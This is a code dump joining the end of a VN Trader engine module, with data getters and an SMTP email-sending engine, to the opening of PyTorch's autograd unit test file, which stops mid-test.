return self.trades.get(vt_tradeid, None) def get_position(self, vt_positionid: str) -> Optional[PositionData]: """ Get latest position data by vt_positionid. """ return self.positions.get(vt_positionid, None) def get_account(self, vt_accountid: str) -> Optional[AccountData]: """ Get latest account data by vt_accountid. """ return self.accounts.get(vt_accountid, None) def get_contract(self, vt_symbol: str) -> Optional[ContractData]: """ Get contract data by vt_symbol. """ return self.contracts.get(vt_symbol, None) def get_all_ticks(self) -> List[TickData]: """ Get all tick data. """ return list(self.ticks.values()) def get_all_orders(self) -> List[OrderData]: """ Get all order data. """ return list(self.orders.values()) def get_all_trades(self) -> List[TradeData]: """ Get all trade data. """ return list(self.trades.values()) def get_all_positions(self) -> List[PositionData]: """ Get all position data. """ return list(self.positions.values()) def get_all_accounts(self) -> List[AccountData]: """ Get all account data. """ return list(self.accounts.values()) def get_all_contracts(self) -> List[ContractData]: """ Get all contract data. """ return list(self.contracts.values()) def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]: """ Get all active orders by vt_symbol. If vt_symbol is empty, return all active orders. """ if not vt_symbol: return list(self.active_orders.values()) else: active_orders = [ order for order in self.active_orders.values() if order.vt_symbol == vt_symbol ] return active_orders class EmailEngine(BaseEngine): """ Provides email sending function for VN Trader. """ def __init__(self, main_engine: MainEngine, event_engine: EventEngine): """""" super(EmailEngine, self).__init__(main_engine, event_engine, "email") self.thread: Thread = Thread(target=self.run) self.queue: Queue = Queue() self.active: bool = False self.main_engine.send_email = self.send_email def send_email(self, subject: str, content: str, receiver: str = "") -> None: """""" # Start email engine when sending first email. if not self.active: self.start() # Use default receiver if not specified. if not receiver: receiver = SETTINGS["email.receiver"] msg = EmailMessage() msg["From"] = SETTINGS["email.sender"] msg["To"] = receiver msg["Subject"] = subject msg.set_content(content) self.queue.put(msg) def run(self) -> None: """""" while self.active: try: msg = self.queue.get(block=True, timeout=1) with smtplib.SMTP_SSL( SETTINGS["email.server"], SETTINGS["email.port"] ) as smtp: smtp.login( SETTINGS["email.username"], SETTINGS["email.password"] ) smtp.send_message(msg) except Empty: pass def start(self) -> None: """""" self.active = True self.thread.start() def close(self) -> None: """""" if not self.active: return self.active = False self.thread.join()
test_autograd.py
import contextlib import gc import sys import io import math import random import tempfile import time import threading import unittest import warnings from copy import deepcopy from collections import OrderedDict from itertools import product, permutations from operator import mul from functools import reduce, partial import torch from torch import nn from torch._six import inf, nan from torch.autograd.function import once_differentiable from torch.autograd.profiler import (profile, format_time, EventList, FunctionEvent, FunctionEventAvg, record_function, emit_nvtx) import torch.autograd.functional as autogradF from torch.utils.checkpoint import checkpoint from torch.testing._internal.common_cuda import TEST_CUDA from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack, suppress_warnings, slowTest, load_tests, IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck, TEST_WITH_ROCM, gradcheck, gradgradcheck, make_tensor) from torch.autograd import Variable, Function, detect_anomaly, kineto_available from torch.autograd.function import InplaceFunction import torch.autograd.forward_ad as fwAD from torch.testing import randn_like from torch.testing._internal.common_methods_invocations import (method_tests, create_input, unpack_variables, EXCLUDE_FUNCTIONAL, EXCLUDE_GRADCHECK, EXCLUDE_GRADGRADCHECK, EXCLUDE_GRADGRADCHECK_BY_TEST_NAME, exclude_tensor_method, mask_not_all_zeros, S) from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm, onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA, deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan, skipCUDAIf) _END_SENTINEL = object() def getattr_qualified(obj, qname, default=None): """ Like getattr but works with qualified names e.g. getattr(torch, 'fft.rfft') """ path = qname.split('.') for name in path: obj = getattr(obj, name, _END_SENTINEL) if obj is _END_SENTINEL: return default return obj # load_tests from common_utils is used to automatically filter tests for # sharding on sandcastle. This line silences flake warnings load_tests = load_tests import pickle PRECISION = 1e-4 @contextlib.contextmanager def backward_engine(engine): _prev_engine = Variable._execution_engine Variable._execution_engine = engine() try: yield finally: Variable._execution_engine = _prev_engine def graph_desc(fn): if fn is None: return 'None' result = type(fn).__name__ + '(' next_functions = fn.next_functions for next_fn, _ in next_functions: result += graph_desc(next_fn) result += ', ' if next_functions: result = result[:-2] return result + ')' class TestAutograd(TestCase): def test_tensor_grad_warnings(self): dummy = torch.empty(1) with warnings.catch_warnings(record=True) as w: # Accessing .grad on leaf dummy.requires_grad_() foo = dummy.grad self.assertEqual(len(w), 0) # Accessing .grad on non-leaf dummy = dummy.clone() foo = dummy.grad self.assertEqual(len(w), 1) # Accessing .grad on non-leaf that retains gradients dummy.retain_grad() foo = dummy.grad self.assertEqual(len(w), 1) def _function_test(self, cls): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) result = cls.apply(x, 2, y) go = torch.ones((), requires_grad=True) result.sum().backward(go, create_graph=True) self.assertEqual(x.grad, y + torch.ones(5, 5)) self.assertEqual(y.grad, x + torch.ones(5, 5) * 2) self.assertIsNotNone(x.grad.grad_fn) self.assertIsNotNone(y.grad.grad_fn) return x, y def test_function(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, pyscalar, tensor2): ctx.pyscalar = pyscalar ctx.save_for_backward(tensor1, tensor2) return tensor1 + pyscalar * tensor2 + tensor1 * tensor2 @staticmethod def backward(ctx, grad_output): var1, var2 = ctx.saved_tensors # NOTE: self is the test case here self.assertIsInstance(var1, torch.Tensor) self.assertIsInstance(var2, torch.Tensor) self.assertIsInstance(grad_output, torch.Tensor) return (grad_output + grad_output * var2, None, grad_output * ctx.pyscalar + grad_output * var1) x, y = self._function_test(MyFunction) x_grad_desc = graph_desc(x.grad.grad_fn) y_grad_desc = graph_desc(y.grad.grad_fn) self.assertExpected(x_grad_desc, "x_grad_desc") self.assertExpected(y_grad_desc, "y_grad_desc") def test_once_differentiable(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, pyscalar, tensor2): ctx.pyscalar = pyscalar ctx.save_for_backward(tensor1, tensor2) return tensor1 + pyscalar * tensor2 + tensor1 * tensor2 @staticmethod @once_differentiable def backward(ctx, grad_output): self.assertFalse(torch.is_grad_enabled()) t1, t2 = ctx.saved_tensors return (grad_output + grad_output * t2, None, grad_output * ctx.pyscalar + grad_output * t1) x, y = self._function_test(MyFunction) self.assertEqual(graph_desc(x.grad.grad_fn), 'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))') self.assertEqual(graph_desc(y.grad.grad_fn), 'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))') def test_function_returns_input(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): return grad * 2 for shape in [(1,), ()]: v = torch.ones(shape, requires_grad=True) MyFunction.apply(v).backward() self.assertEqual(v.grad, torch.full(shape, 2.)) with torch.no_grad(): v.grad.zero_() MyFunction.apply(v.clone()).backward() self.assertEqual(v.grad, torch.full(shape, 2.)) def test_function_returns_undefined_tensor(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x * 2 @staticmethod def backward(ctx, grad): return None # Test that undefined tensors returned from custom backward function # are propagated as undefined and not tensor full of zeroes x = torch.ones(1, requires_grad=True) MyFunction.apply(x).backward() self.assertIsNone(x.grad) MyFunction.apply(x ** 2).backward() self.assertIsNone(x.grad) MyFunction.apply(x).sum().backward() self.assertIsNone(x.grad) self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0]) def test_materialize_grads(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): self.assertEqual(grad, torch.zeros(1)) return grad x = torch.ones(1, requires_grad=True) torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward() def test_dont_materialize_grads(self): class MyFunction(Function): @staticmethod def forward(ctx, x): ctx.set_materialize_grads(False) return x @staticmethod def backward(ctx, grad): self.assertIsNone(grad) return grad x = torch.ones(1, requires_grad=True) torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward() def test_legacy_function_deprecation_exception(self): # Trigger exception class MyFunction(Function): def forward(self, x): return x def backward(self, grad_output): return grad_output # Check exception occurs with self.assertRaisesRegex( RuntimeError, 'Legacy autograd function with non-static forward method is deprecated'): MyFunction()(torch.randn(3, 4)) class SimulateBackwardError(Function): @staticmethod def forward(ctx, input): return input.clone() @staticmethod @once_differentiable def backward(ctx, input): raise Exception("Simulate error on backward pass") def test_custom_function_exception(self): t1 = torch.rand((3, 3), requires_grad=True) t2 = torch.rand((3, 3), requires_grad=True) tmp = (t1 + t2) * (t1 + t2) t3 = TestAutograd.SimulateBackwardError.apply(tmp) with self.assertRaisesRegex(Exception, "Simulate error on backward pass"): t3.sum().backward() def test_custom_function_non_tensor_inputs_outputs(self): class MyFunction(Function): @staticmethod def forward(ctx, t1, t2, scale, t3): t4 = t1 + t2 * t3 t5 = t1 * t2 + t3 t4 *= scale t5 *= scale # Save scale ctx.scale = scale ctx.save_for_backward(t1, t2, t3) return scale, t4, None, True, t5, "bar", t1 @staticmethod @once_differentiable def backward(ctx, *grads): # Verify grads self.assertEqual(7, len(grads)) self.assertIsNone(grads[0]) self.assertIsNone(grads[2]) self.assertIsNone(grads[3]) self.assertIsNone(grads[5]) scale = ctx.scale var1, var2, var3 = ctx.saved_tensors return ( grads[1] * scale + grads[4] * var2 * scale + grads[6], grads[1] * var3 * scale + grads[4] * var1 * scale, None, grads[1] * var2 * scale + grads[4] * scale, ) t1 = torch.rand(10, dtype=torch.double, requires_grad=True) t2 = torch.rand(10, dtype=torch.double, requires_grad=True) t3 = torch.rand(10, dtype=torch.double) scale = random.randint(0, 10) res = MyFunction.apply(t1, t2, scale, t3) self.assertEqual(scale, res[0]) self.assertEqual((t1 + t2 * t3) * scale, res[1]) self.assertEqual(None, res[2]) self.assertEqual(True, res[3]) self.assertEqual((t1 * t2 + t3) * scale, res[4]) self.assertEqual("bar", res[5]) self.assertEqual(t1, res[6]) # Validate running backward. torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()]) self.assertIsNotNone(t1.grad) self.assertIsNotNone(t2.grad) self.assertIsNone(t3.grad) # Test gradcheck def foo(t1, t2, t3): res = MyFunction.apply(t1, t2, scale, t3) return res[1], res[4], res[6] gradcheck(foo, (t1, t2, t3)) def test_custom_function_no_tensors(self): class MyFunction(Function): @staticmethod def forward(ctx, t1, t2, scale, t3): t4 = t1 + t2 * t3 t5 = t1 * t2 + t3 t4 *= scale t5 *= scale return scale, t4, None, True, t5, "bar", t1 @staticmethod @once_differentiable def backward(ctx, *args): return (args[0], args[1], None, args[2]) t1 = random.random() t2 = random.random() t3 = random.random() scale = random.randint(0, 10) res = MyFunction.apply(t1, t2, scale, t3) self.assertEqual(scale, res[0]) self.assertEqual((t1 + t2 * t3) * scale, res[1]) self.assertEqual(None, res[2]) self.assertEqual(True, res[3]) self.assertEqual((t1 * t2 + t3) * scale, res[4]) self.assertEqual("bar", res[5]) self.assertEqual(t1, res[6]) def test_invalid_gradients(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x * 2 @staticmethod def backward(ctx, grad_output): return torch.randn(10, dtype=torch.float) with self.assertRaisesRegex(RuntimeError, 'expected shape'): input = torch.randn(5, 5, dtype=torch.float, requires_grad=True) MyFunction.apply(input).sum().backward() def test_accumulate_grad(self): grad_output = torch.ones(5, 5) def compute_grad(create_graph): x = torch.randn(5, 5, requires_grad=True) y = x + 2 y.backward(grad_output, retain_graph=True) x_grad = x.grad x_grad_clone = x.grad.clone() y.backward(grad_output, create_graph=create_graph) return x_grad, x_grad_clone # Accumulate in-place when create_graph is False x_grad, x_grad_clone = compute_grad(create_graph=False) self.assertEqual(x_grad, x_grad_clone * 2) # Accumulate out-of-place when create_graph is False x_grad, x_grad_clone = compute_grad(create_graph=True) self.assertEqual(x_grad, x_grad_clone) def test_accumulate_grad_tensor_reference(self): def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph): params = torch.tensor([1.5, 1.5]).requires_grad_() params.grad = params_grad_tensor grad_saved = params.grad params.backward(backward_grad_tensor, create_graph=create_graph) self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference) for create_graph in (False, True): # Accumulate dense gradient to sparse gradient will change the `params.grad` reference _test_grad_tensor( torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), torch.tensor([1.5, 1.5]), False, # never accumulates in-place create_graph) # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference, # but only if create_graph=False. _test_grad_tensor( torch.tensor([1.5, 1.5]), torch.tensor([1.5, 1.5]), not create_graph, create_graph) # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference, # but only if create_graph=False. _test_grad_tensor( torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])), not create_graph, create_graph) @skipIfNoLapack def test_slogdet_sign(self): a = torch.randn(3, 3, dtype=torch.double, requires_grad=True) s, logdet = a.slogdet() # test that sign should not require grad self.assertFalse(s.requires_grad) # test that backward through computation involving sign works def sign_mul_logdet(mat): s, logdet = mat.slogdet() return s * logdet u, s, v = a.detach().svd() s.abs_().clamp_(0.0001) for sign in (-1, 1): s[-1] = sign mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_() gradcheck(sign_mul_logdet, mat) gradgradcheck(sign_mul_logdet, mat) def test_sum_to_with_empty_dim_grad(self): a = torch.rand(4, 0, requires_grad=True) b = torch.rand(4, 1, requires_grad=True) c = a + b assert c.shape == (4, 0) c.sum().backward() self.assertEqual(b.grad, torch.zeros(4, 1)) self.assertEqual(a.grad, torch.zeros(4, 0)) def test_hessian_vector(self): x = torch.randn(2, 2, requires_grad=True) y = torch.randn(2, 2, requires_grad=True) z = x ** 2 + y * x + y ** 2 z.backward(torch.ones(2, 2), create_graph=True) with torch.no_grad(): x_grad = 2 * x + y y_grad = x + 2 * y self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) grad_sum = 2 * x.grad + y.grad grad_sum.backward(torch.ones(2, 2)) x_hv = torch.ones(2, 2) * 5 y_hv = torch.ones(2, 2) * 4 self.assertEqual(x.grad, x_grad + x_hv) self.assertEqual(y.grad, y_grad + y_hv) def test_grad(self): x = torch.randn(2, 2, requires_grad=True) y = torch.randn(2, 2, requires_grad=True) z = x ** 2 + y * x + y ** 2 z.backward(torch.ones(2, 2), create_graph=True) x_grad = 2 * x + y y_grad = x + 2 * y self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) grad_sum = 2 * x.grad + y.grad x_hv = torch.autograd.grad( outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)], inputs=[x], create_graph=True) expected_x_hv = torch.ones(2, 2) * 5 expected_y_hv = torch.ones(2, 2) * 4 self.assertEqual(x_hv[0], expected_x_hv) self.assertEqual(x.grad, x_grad) self.assertEqual(y.grad, y_grad) # Test that grad_outputs and outputs have the same shape grad_out = torch.ones(2) try: torch.autograd.grad( outputs=[grad_sum], grad_outputs=[grad_out], inputs=[x], create_graph=True) self.assertFail() except RuntimeError as error: self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of " + str(grad_out.shape) + " and output[0] has a shape of " + str(grad_sum.shape) + ".") def test_grad_nonleaf(self): x_init = torch.randn(2, 2, requires_grad=True) x = x_init y = torch.randn(2, 2, requires_grad=True) grad_output = torch.ones(2, 2) def fn(x): return x ** 2 + y * x + y ** 2 for _ in range(5): grad_x, = torch.autograd.grad( fn(x), x, grad_outputs=grad_output, create_graph=True) grad_x_expected = 2 * x + y self.assertIsNone(y.grad) self.assertIsNone(x.grad) self.assertEqual(grad_x, grad_x_expected) x = x + 0.05 * grad_x val_init = fn(x_init).sum() val_final = fn(x).sum() self.assertGreater(val_final, val_init) x.backward(grad_output) self.assertIsNotNone(y.grad) self.assertIsNotNone(x_init.grad) def test_grad_nonleaf_many_outputs(self): # This checks an edge case for function callbacks # We want to capture two grads of a function, but can only # register a single callback. x = torch.randn(4, 2, requires_grad=True) a, b = x.chunk(2) def hook(*grads): hook_called[0] = True hook_called = [False] x.register_hook(hook) go = torch.randn(2, 2) grad_a, grad_b = torch.autograd.grad( (a + 2 * b), [a, b], grad_outputs=go, create_graph=True) self.assertEqual(grad_a, go) self.assertEqual(grad_b, go * 2) self.assertFalse(hook_called[0]) self.assertIsNone(x.grad) def test_grad_nonleaf_register_hook(self): # This checks an edge case for register_hook. # We want to capture grad of a nonleaf tensor, # but avoid segfault during backward of other nonleaf tensors x = torch.randn(5, requires_grad=True) x_list = x.unbind() x0 = x_list[0] hook_results = [None] def hook(grad): hook_results[0] = grad x0.register_hook(hook) x_list[0].backward() self.assertEqual(hook_results[0], torch.tensor(1.)) expected_grad = torch.tensor([1., 0, 0, 0, 0]) self.assertEqual(x.grad, expected_grad) self.assertIsNone(x_list[0].grad) for i in range(1, 5, 1): x_list[i].backward() self.assertEqual(hook_results[0], None) expected_grad[i] = 1.0 self.assertEqual(x.grad, expected_grad) self.assertIsNone(x_list[i].grad) def test_hook_with_no_name(self): # Create a hook that do not have a __name__ attribute class MyHookClass: def __call__(self, grad): return grad.clone() x = torch.randn(5, requires_grad=True).clone() x.register_hook(MyHookClass()) x.sum().backward() # Should run fine def test_sharded_grad(self): leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)] intermediates = [l * i + l * l for i, l in enumerate(leaves)] loss = sum(v * i for i, v in enumerate(intermediates)).sum() # define a helper for dividing intermediates into groups def group(l, group_size): return (l[i:i + group_size] for i in range(0, len(l), group_size)) # Compute the d loss / d intermediates in chunks of shard_size shard_size = 2 d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size) for d_i in torch.autograd.grad(loss, intermediates_batch)] # Compute rest of backward pass torch.autograd.backward(intermediates, d_intermediates) for i, l in enumerate(leaves): self.assertEqual(l.grad, i * i * (1 + l)) def test_backward_badcalls(self): x = torch.ones(1) with self.assertRaisesRegex(RuntimeError, 'does not require grad'): x.backward() def test_grad_badcalls(self): x = torch.ones(1) y = x ** 2 with self.assertRaisesRegex(RuntimeError, 'does not require grad'): torch.autograd.grad(x, y) with self.assertRaisesRegex(RuntimeError, 'does not require grad'): torch.autograd.grad(y, x) x = torch.ones(1, requires_grad=True) y = x ** 2 torch.autograd.grad(y, x) # this should succeed now def test_grad_fn_badcalls(self): error_regex = 'expected .* arguments, got .* instead' x = torch.ones(1, requires_grad=True) y = x ** 2 with self.assertRaisesRegex(TypeError, error_regex): y.grad_fn(x.detach(), x.detach()) # too many with self.assertRaisesRegex(TypeError, error_regex): y.grad_fn() # too few y.grad_fn(x.detach()) # this should succeed def test_grad_unreachable(self): x = torch.ones(1, requires_grad=True) y = torch.ones(1, requires_grad=True) # Make sure x and y have grad accumulators allocated z = x * 2 w = y * 2 grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True) self.assertEqual(grad_x, x * 2) self.assertIsNone(grad_y) # This is slightly different than the case above, because z doesn't even # have a grad accumulator allocated. z = torch.ones(1, requires_grad=True) grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True) self.assertEqual(grad_x, x * 2) self.assertIsNone(grad_z) # allow_unused=False, but grads contains None inside, should throw with self.assertRaisesRegex(RuntimeError, "Set allow_unused=True"): grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False) def test_grad_unreachable_discovery(self): # Test that certain nodes are not erroneously executed when an input # is unreachable. See #39784 class MyFunc(torch.autograd.Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): self.fail("This node should not be executed!") x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True) self.assertIsNone(gY) x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) z = torch.randn(1, requires_grad=True) (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True) self.assertIsNone(gY) self.assertIsNotNone(gZ) x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2) y = torch.randn(1, requires_grad=True) torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True! self.assertIsNone(y.grad) def test_hooks(self): x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5) * 4 y.requires_grad_(True) counter = [0] def bw_hook(inc, grad): self.assertIsInstance(grad, torch.Tensor) counter[0] += inc z = x ** 2 + x * 2 + x * y + y x.register_hook(lambda *args: bw_hook(0, *args)) test = z.register_hook(lambda *args: bw_hook(1, *args)) z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 1) test2 = z.register_hook(lambda *args: bw_hook(2, *args)) z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 4) test2.remove() z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(counter[0], 5) def bw_hook_modify(grad): return grad.mul(2) test.remove() z.register_hook(bw_hook_modify) with torch.no_grad(): y.grad.zero_() z.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(y.grad, (x + 1) * 2) y.register_hook(bw_hook_modify) with torch.no_grad(): y.grad.zero_() z.backward(torch.ones(5, 5)) self.assertEqual(y.grad, (x + 1) * 4) def test_hooks_cpp(self): # Tests hooks for autograd function implemented in C++ bn = torch.nn.BatchNorm1d(5, affine=False) bn.double() bn.eval() counter = [0] def bw_hook(grad): counter[0] += 1 return grad * 2 x = torch.ones(5, 5, dtype=torch.double, requires_grad=True) z = bn(x) z.register_hook(bw_hook) z.sum().backward() self.assertEqual(counter[0], 1, msg='bw_hook not called') self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0) def test_hook_none(self): # WARNING: this is a test for autograd internals. # You should never have to use such things in your code. class NoneGradientFunction(Function): @staticmethod def forward(ctx, x, y): assert ctx.needs_input_grad[0] assert not ctx.needs_input_grad[1] return x, y @staticmethod def backward(ctx, grad_x, grad_y): return grad_x, None was_called = [False] def hook(grad): self.assertIsNotNone(grad) was_called[0] = True x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5) rx, ry = NoneGradientFunction.apply(x, y) rx.register_hook(hook) ry.register_hook(hook) sum(rx, ry).sum().backward() self.assertTrue(was_called[0]) def test_retain_grad(self): input = torch.rand(1, 3, requires_grad=True) h1 = input * 3 out = (h1 * h1).sum() # It should be possible to call retain_grad() multiple times h1.retain_grad() h1.retain_grad() # Gradient should be accumulated out.backward(retain_graph=True) self.assertEqual(h1 * 2, h1.grad) out.backward(retain_graph=True) self.assertEqual(h1 * 4, h1.grad) with torch.no_grad(): input.grad.zero_() # It should be a no-op for leaves input.retain_grad() input.retain_grad() out.backward() self.assertEqual(input * 18, input.grad) def test_retain_grad_cycle(self): x = torch.ones(5, 5, requires_grad=True) def run_test(): y = x * 2 y.retain_grad() return y / 2, torch._C._WeakTensorRef(y) z, ref = run_test() self.assertTrue(ref.expired()) z.sum().backward() def test_backward(self): v = torch.randn(5, 5, requires_grad=True) x = torch.randn(5, 5, requires_grad=True) y = (torch.rand(5, 5) + 0.1).requires_grad_(True) z = torch.randn(5, 5, requires_grad=True) grad_output = torch.randn(5, 5) v.backward(grad_output) self.assertEqual(v.grad, grad_output) a = x + (y * z) + 4 * z ** 2 * x / y a.backward(grad_output) x_grad = 4 * z.pow(2) / y + 1 y_grad = z - 4 * x * z.pow(2) / y.pow(2) z_grad = 8 * x * z / y + y self.assertEqual(x.grad, x_grad * grad_output) self.assertEqual(y.grad, y_grad * grad_output) self.assertEqual(z.grad, z_grad * grad_output) def test_sparse_mm_backward(self): size = (3, 3) sparse = torch.sparse_coo_tensor(size, requires_grad=True) dense = torch.randn(size, requires_grad=True) with self.assertRaisesRegex( RuntimeError, "The backward pass for this operation requires the 'mat1' tensor to be strided,"): z = dense.addmm(sparse, dense) mm_test_cases = [ # a requires grad, a is sparse, b requires grad, b is sparse, error message (False, True, True, False, None), (False, False, True, True, "The backward pass for this operation requires the 'mat2'"), (False, True, True, True, "The backward pass for this operation requires the 'mat2'"), (True, False, True, True, "The backward pass for this operation requires the 'mat2'"), (True, True, False, False, "The backward pass for this operation requires the 'self'"), (True, True, True, False, "The backward pass for this operation requires the 'self'"), (True, True, True, True, "The backward pass for this operation requires the 'mat2'"), ] for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases: # We should only be testing cases with sparse inputs, and at least one # input needs to require grad so we can call a backward pass assert a_is_sparse or b_is_sparse assert a_req_grad or b_req_grad a = torch.randn(size, requires_grad=a_req_grad) if a_is_sparse: a = a.to_sparse() b = torch.randn(size, requires_grad=b_req_grad) if b_is_sparse: b = b.to_sparse() # If no error expected, check that sparse and dense cases match if err_msg is None: r = a.mm(b) r.sum().backward() a_grad = None if a.grad is None else a.grad.clone().detach() b_grad = None if b.grad is None else b.grad.clone().detach() # Redo with only dense tensors a = (a.to_dense() if a.is_sparse else a).clone().detach() a.requires_grad = a_req_grad b = (b.to_dense() if b.is_sparse else b).clone().detach() b.requires_grad = b_req_grad r = a.mm(b) r.sum().backward() self.assertEqual(a_grad, a.grad) self.assertEqual(b_grad, b.grad) else: with self.assertRaisesRegex(RuntimeError, err_msg): a.mm(b) def test_multi_backward(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) q = torch.randn(5, 5, requires_grad=True) a = torch.randn(5, 5, requires_grad=True) b = torch.randn(5, 5, requires_grad=True) q2 = q * 2 z = x + y + q2 c = a * b + q2 grad_z = torch.randn(5, 5) grad_c = torch.randn(5, 5) torch.autograd.backward([z, c], [grad_z, grad_c]) self.assertEqual(x.grad, grad_z) self.assertEqual(y.grad, grad_z) self.assertEqual(a.grad, grad_c * b) self.assertEqual(b.grad, grad_c * a) self.assertEqual(q.grad, (grad_c + grad_z) * 2) def test_multi_backward_no_grad(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=False) z = x + y q = y * 2 # NB: we currently raise an exception if any arguments to backwards # have requires_grad=False and don't have a grad_fn. We may want to # relax that check to a warning. def call_backwards(): torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)]) self.assertRaises(RuntimeError, call_backwards) def test_backward_with_inputs(self): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) y = torch.randn(2, 2, dtype=torch.double, requires_grad=True) def fn(): return x ** 2 + y * x + y ** 2 gradient = torch.ones(2, 2) x_grad_expected = 2 * x + y y_grad_expected = x + 2 * y @torch.no_grad() def reset_grad(): x.grad.zero_() y.grad.zero_() torch.autograd.backward(fn(), gradient, inputs=[x, y]) self.assertEqual(x.grad, x_grad_expected) self.assertEqual(y.grad, y_grad_expected) reset_grad() torch.autograd.backward(fn(), gradient, inputs=[x]) self.assertEqual(x.grad, x_grad_expected) self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() torch.autograd.backward(fn(), gradient, inputs=[y]) self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() torch.autograd.backward(fn(), gradient, inputs=y) self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False) reset_grad() self.assertRaisesRegex(RuntimeError, 'cannot be empty', lambda: torch.autograd.backward(fn(), gradient, inputs=[])) def test_backward_with_nonleaf_inputs(self): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) x_nonleaf = x * 1 y = torch.randn(2, 2, dtype=torch.double, requires_grad=True) z = torch.randn(2, 2, dtype=torch.double, requires_grad=True) out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2 out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y]) x_grad_expected = 2 * x + y y_grad_expected = x + 2 * y self.assertEqual(y.grad, y_grad_expected) self.assertEqual(x.grad, x_grad_expected) self.assertRaisesRegex(RuntimeError, 'not a leaf Tensor', lambda: out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])) # backward doesn't have an allow_unused flag, so the behavior of backward # when variable is not part of the graph is as if allow_used were true # x.grad will simply be None. out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z]) self.assertIsNone(z.grad) def test_dependent_backward(self): x = torch.randn(10, requires_grad=True) y = x ** 2 z = y ** 3 go_y = torch.randn(10) go_z = torch.randn(10) torch.autograd.backward([y, z], [go_y, go_z]) xd = x self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z) def test_save_output_nr(self): x = torch.randn(10, requires_grad=True) class MultiOutputFn(Function): @staticmethod def forward(ctx, x): return x[:5], x[5:] @staticmethod def backward(ctx, *grad): return torch.cat(grad) a, b = MultiOutputFn.apply(x) self.assertEqual(b.output_nr, 1) class TestFn(Function): @staticmethod def forward(ctx, b): ctx.save_for_backward(b) return b * 2 @staticmethod def backward(ctx, grad_b): b, = ctx.saved_tensors self.assertEqual(b.output_nr, 1) TestFn.apply(b).sum().backward() def test_free_deep_graph(self): def scope(): depth = 150000 x = torch.randn(1, requires_grad=True) y = x.clone() # build a "chain" computation graph for _ in range(depth): y = y + y * 0.000001 # graph deletion occurs when the above locals go out of scope. # In this case `del y` will trigger it but it's easier to leave # it to Python to delete the locals. # Should not stack overflow scope() def test_free_deep_graph_complicated(self): def scope(): depth = 100000 randchoice = torch.randint(2, [depth, 2]) x = torch.randn(1, requires_grad=True) y = x.clone() # Hold the two previous values prev_values = [None, None] # Build a "chain with skip connections" graph for _ in range(depth): prev_tensors = [tensor for tensor in prev_values[:-1] if tensor is not 